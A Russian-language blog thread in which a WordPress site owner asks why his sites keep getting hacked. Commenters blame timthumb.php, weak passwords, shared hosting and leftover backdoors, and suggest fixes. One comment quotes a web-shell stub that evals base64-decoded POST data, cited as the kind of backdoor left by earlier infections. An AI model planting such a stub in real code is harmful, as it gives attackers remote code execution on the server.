GD Star Rating
loading...

Я вот делаю часто и довольно много сайты на WordPress и их постоянно ломают.
Понятное дело что бэк-ап есть и восстановить не сложно, и плагины стоят антивирусные всякие.
Но блин я уже настолько устал от этих уязвимостей что решил изучить проблему с другой стороны.
Я вот создал сайт на WP 3.5.1 такой же как и остальные мои.
Установил купленную тему, подобную как и на других сайтах.
Кто нибудь может поломать и тут рассказать ход шагов? или если не тут то в посте.
Да я хочу научится ломать вордпресс, но не сцелью пакостить а с целью самообучения и пониманию того как мыслит хакер и какие мне дыры латать в будуещем.

Как ломают WordPress, 5.0 out of 5 based on 1 rating
Tagged with →  

35 Responses to Как ломают WordPress

  1. Ail00:

    Мягко говоря, странный подход ты выбрал.
    Зачем тебе латать WP, если его латают сами разработчики? Обновляй да все. Не нравится, что постоянно ломают – перейди на что-то более качественное.

  2. ZloCap:

    Большой вопрос, ломают из-за установленных тобой плагинов, неправильных прав у папок на фтп или из-за скриптов в шаблоне.

  3. SodVelo:

    латать то латают, но каждый раз, есть новые дыры. я сразу же обновляю всегда и ядро ВП и плагины.

  4. SodVelo:

    кулхацкеры есть в блоге?

  5. SodVelo:

    точно не брутом, точно не получением доступа к ФТП, к базе или админке. ломают как то через ПХП, sql, xss иньекции

  6. RetZlo:

    последний поломанный вордпресс – через старую багу в timthumb.php, который говноделы любят добавлять в свои говнотемы

  7. RetZlo:

    (это моего клиента поломали, а не я, есличо)

  8. SodVelo:

    последний timthumb вроде как крепкий.

  9. RetZlo:

    он же успел расползтись по темам
    я ж не буду бдить у кого какая тема стоит

    вот и превентивно обновил всем все копии timthumb.php

  10. 005er:

    я думаю логичнее искать по логам сразу после установления факта взлома. Я с WP давно дружу и плагины под него писал, но вот сайты мои ещё ни разу ни-ни, возможно они просто никого не интересовали (большинство сайтов для штатов).

    Это я к чему – там СДЕЛАТЬ самому дырку, написав плагин, который как минимум не будет фильтровать получаемые от пользователя данные – уже огромная дырка, поэтому обязательно смотрим на то, какие плагины у тебя были, что вообще ставил, права на папки смотрим.

    и, да, WP откуда качаешь? аргинал или русскую перелопаченную версию?

  11. 005er:

    кстати, может и сам хостер дырявый, если это всегда на одном и том же хостинге происходит.

  12. 01pre:

    АААА БЛЯТЬ КТО ИХ ВЫПУСТИЛ?!

  13. Samko:

    Пиздешь и провокация ) Уверен что пробема в хостинге. Еще ни разу не доводилось видеть чтобы один из моих сайтов на wp ломали. Для безопасности советую поставить http://wordpress.org/extend/plugins/hide
    Ну и понятное дело пароли явки нормальные делал.

  14. Hcion:

    Вас наверно всех в Гугле забанили

  15. Tua00:

    в пхп всегда будут дыры, он даже уже руби с рельсами пошел по швам, как за него взялись серьезно. Самый надежный вариант это Java, хотя и в ней дыры бывают, но уровень безопасности у нее очень высокий.

  16. SodVelo:

    вордпресс чистый и всегда только с оф сайта. плагины сам ставлю если только по безопасности и сео. оба с высокими рейтингами и вероятность что имеют дырку они мала, так как в обсуждениях к плагинам замечаний не встречалось. вероятно темы имеющие встроеные плагины могут дырявится. Сейчас по результатам гугла есть волна захлестнувшая ВП сайты. везде один сценарий – вместо сайта пустая страница с надписью Hacked by %somebody%. внутри в админке кракозябры, поменяна кодировка базы.

    вот узнать бы технологию именно этих взломов.

  17. SodVelo:

    на хостера не грешу но может и они что скрывают. Инфобокс уже как лет пять.

  18. SodVelo:

    с правами всё чётко, рука набита уже.

  19. SodVelo:

    а чего с рейтингом у плагина?

  20. SodVelo:

    Друг мой, что ты ввёл выдаёт мильон результатов с начала эры. я же говорю о последних сборках 3.5 и выше. но даже если у гугла попросить запросы за последний промежуток с даты выхода 3.5 полезных результатов найти не удаётся. только разговоры о том как лечить – а это в сотнях вариантов написанные фразы аля “делайте часто бэк ап” или “переустановите вордпресс” – всё.

    в блоге помойму нет тех кого в “Гугле забанили”. Тут все спрашивают как у друга близкого. Вон помню на питер блоге советовали где соус тобаско купить. хотя яндекс карта могла дать сотни результатов.

  21. SodVelo:

    я подумал, что ты уже окончательно надоелл и пошёл к тебе в карму – но кто то там был до меня с моего аккаунта.

  22. YikLt:

    последняя шутка про Java: «Java 8 will offer an exploit API.»

  23. SirVelo:

    сканируй сайт wpscan’ом, есть в дистре backtrack. Потом в 3.5.1 и ниже есть раскрытие путей, ломать соседей и искать тебя достаточно легко. в админке запрет на заливку тем и плагинов, если грешишь на брут – дополнительно htaccesом закрой на доступ с твоего айпи и все. машину свою на вирусы проверь еще. вопросы будут – пиши.

  24. Samko:

    Его немного геморно настраивать ) Возможно из-за этого многие пишут что не работает.

  25. DikMsk:

    Ломать не научу, но вот тебе крутое решение. Добавляешь сайт в git (или другую систему контроля версий), и по крону делаешь reset hard. То есть перетираются все файлы, которых нет в системе контрооля версий. И, конечно же, вырубаешь ftp на серваке.

  26. NinLinux:

    много летний опыт говорит следующее:
    1. весь рунет постоянно сканируется на слабые пароли на вордпресс-сайтах (если посомтреть логи, можно увидеть запросы ПОСТом в wp-login.php. На одном наблюдаемом сайте видел 5 разных сканеров в один день). Соответственно частая проблема – словарные пароли (admin, 123456, qwerty9876 итд)
    2. timthumb конечно же.
    3. Завирусованные сайты на этом же хостинге – скрипту пофиг на домен, он сканирует файловую систему и заражает все php-файлы.
    4. Закладки, оставшиеся с пердыдущих заражений типа
    if ( isset( $_POST[‘php’] ) ) eval( base64_decode( $_POST[‘php’] ) )
    ну сюда же отнесем залитые шеллы.

    по статистике 90% заражений происходит по первой причине. 3 и 4 пункты вытекают из первого.

  27. Habre:

    знатный костылище!

  28. HtoAdm:

    3 фиксится запретом на запись для всех, кроме владельца, владельца сменить с веб-сервера на свой юзерский аккаунт – если это возможно, конечно же.

    Так же я пишу подробно все посты, удобно раскручивать уязвимости, когда у тебя есть информация, знаете ли.

  29. DikMsk:

    а в чем костыльность. Линукс уже давно свои конфиги в гите хранит. И ничего брат жив, никакого привыкания.

  30. DikMsk:

    а в чем проблема Timthimb. Вроде новую версию разработчик пофиксил или я чего-то не знаю?

  31. Habre:

    костыльность не в самом использовании гита, а в резете по крону. в идеале нужно найти и закрыть все дырки) но т.к. это задача разработчика, а не “веб-мастера” – в данном случае решение зосчитано

  32. DikMsk:

    > в идеале нужно найти и закрыть все дырки)
    И демократию в Сомали заодно.
    А резет это по вкусу можно просто смотреть, что изменилось.

  33. RetZlo:

    а кто пофиксит
    1) дистрибутивы тем, в которых используется уязвимая версия timthumba?
    2) устанновленные темы, в которых используется уязвимая версия timthumba?

  34. DikMsk:

    я имел в виду, конкретно мой, свежеустановленный timthumb

  35. RetZlo:

    ну автор-то пишет про “купленную тему”, а я хз что там внутри той темы.

Добавить комментарий